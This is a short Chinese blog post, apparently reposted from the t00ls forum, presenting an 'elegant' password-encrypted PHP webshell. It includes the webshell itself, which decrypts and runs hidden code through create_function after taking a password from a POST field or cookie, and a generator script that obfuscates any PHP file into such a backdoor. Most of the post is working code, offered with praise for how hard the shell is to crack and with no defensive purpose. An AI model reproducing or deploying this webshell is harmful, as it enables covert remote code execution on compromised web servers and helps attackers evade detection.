优美的加密WebShell
为什么说它优美,它的加密确实做的非常的不错,用密码来做解密的思路棒极了!只能爆破密码
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 |
<?php $wp__wp = 'base' . (32 * 2) . '_de' . 'code'; $wp__wp = $wp__wp(str_replace(array("\r","\n"), array('',''), 'sF57LTWrfWWCbpXqhIKuMLGuCoZcpOYHdKLhkocso1nWAab9ha0yXMD96/9aQVwpqQXl/tjeoaG92omX zI9mMw==')); $wp_wp = isset($_POST['wp_wp']) ? $_POST['wp_wp'] : (isset($_COOKIE['wp_wp']) ? $_COOKIE['wp_wp'] : NULL); if ($wp_wp !== NULL) { $wp_wp = md5($wp_wp) . str_repeat(substr(md5(strrev($wp_wp)), 0, strlen($wp_wp)),10); for ($wp___wp = 0; $wp___wp < 65; $wp___wp++) { $wp__wp[$wp___wp] = chr((ord($wp__wp[$wp___wp]) - ord($wp_wp[$wp___wp])) % 256); $wp_wp.= $wp__wp[$wp___wp]; } if ($wp__wp = @gzinflate($wp__wp)) { if (isset($_POST['wp_wp'])) @setcookie('wp_wp', $_POST['wp_wp']); $wp___wp = create_function('', $wp__wp); unset($wp__wp, $wp_wp); $wp___wp(); } } ?><form action="" method="post"><input type="text" name="wp_wp" value=""/><input type="submit" value=">"/></form> |
生成代码:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
<?php $file = '1.php'; /*要加密的文件*/ $pass = '123456'; /*登录密码*/ function enc($code,$pass) { $len = strlen($code); for($i = 0; $i < $len; $i++) { $pass .= $code[$i]; $code[$i] = chr((ord($code[$i]) + ord($pass[$i])) % 256); } $code = base64_encode($code); $temp = str_split($code,80); $newc = join("\r\n",$temp); return $newc; } $code = file_get_contents($file); $code = base64_encode(' ?>'.$code.'<?php '); $code = 'eval(base64_decode(\''.$code.'\'));exit;'; $code = gzdeflate($code); $pass = md5($pass).str_repeat(substr(md5(strrev($pass)),0,strlen($pass)),10); $out = base64_decode('PD9waHANCiR3cF9fd3AgPSAnYmFzZScgLiAoMzIgKiAyKSAuICdfZGUnIC4gJ2NvZGUnOw0KJHdwX193cCA9ICR3cF9fd3Aoc3RyX3JlcGxhY2UoYXJyYXkoIlxyIiwiXG4iKSwgYXJyYXkoJycsJycpLCAn').enc($code,$pass); $out .= base64_decode('JykpOw0KJHdwX3dwID0gaXNzZXQoJF9QT1NUWyd3cF93cCddKSA/ICRfUE9TVFsnd3Bfd3AnXSA6IChpc3NldCgkX0NPT0tJRVsnd3Bfd3AnXSkgPyAkX0NPT0tJRVsnd3Bfd3AnXSA6IE5VTEwpOw0KaWYgKCR3cF93cCAhPT0gTlVMTCkgew0KICAgICR3cF93cCA9IG1kNSgkd3Bfd3ApIC4gc3Vic3RyKG1kNShzdHJyZXYoJHdwX3dwKSksIDAsIHN0cmxlbigkd3Bfd3ApKTsNCiAgICBmb3IgKCR3cF9fX3dwID0gMDsgJHdwX19fd3AgPCA=').strlen($code); $out .= base64_decode('OyAkd3BfX193cCsrKSB7DQogICAgICAgICR3cF9fd3BbJHdwX19fd3BdID0gY2hyKChvcmQoJHdwX193cFskd3BfX193cF0pIC0gb3JkKCR3cF93cFskd3BfX193cF0pKSAlIDI1Nik7DQogICAgICAgICR3cF93cC49ICR3cF9fd3BbJHdwX19fd3BdOw0KICAgIH0NCiAgICBpZiAoJHdwX193cCA9IEBnemluZmxhdGUoJHdwX193cCkpIHsNCiAgICAgICAgaWYgKGlzc2V0KCRfUE9TVFsnd3Bfd3AnXSkpIEBzZXRjb29raWUoJ3dwX3dwJywgJF9QT1NUWyd3cF93cCddKTsNCiAgICAgICAgJHdwX19fd3AgPSBjcmVhdGVfZnVuY3Rpb24oJycsICR3cF9fd3ApOw0KICAgICAgICB1bnNldCgkd3BfX3dwLCAkd3Bfd3ApOw0KICAgICAgICAkd3BfX193cCgpOw0KICAgIH0NCn0gPz48Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0Ij48aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0id3Bfd3AiIHZhbHVlPSIiLz48aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iJmd0OyIvPjwvZm9ybT4='); echo '<pre>'; echo htmlspecialchars($out); echo '</pre>'; ?> |
代码出自t00ls,稍作修改~
暂无评论